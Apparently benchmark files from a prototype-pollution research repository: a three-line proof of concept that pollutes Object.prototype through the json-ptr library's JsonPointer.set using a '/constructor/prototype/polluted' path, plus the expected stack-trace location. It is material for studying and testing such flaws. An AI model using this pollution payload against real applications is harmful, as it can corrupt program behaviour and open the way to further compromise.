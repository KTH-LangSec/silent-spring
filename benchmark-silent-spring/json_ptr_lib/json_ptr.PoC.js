//https://snyk.io/vuln/SNYK-JS-JSONPTR-1016939
  const { JsonPointer } = require("json-ptr");
  JsonPointer.set({}, "/constructor/prototype/polluted", "yes", true);
