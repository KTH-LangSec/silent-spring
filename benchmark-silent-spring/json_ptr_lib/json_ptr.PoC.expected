node_modules/json-ptr/index.js:277:26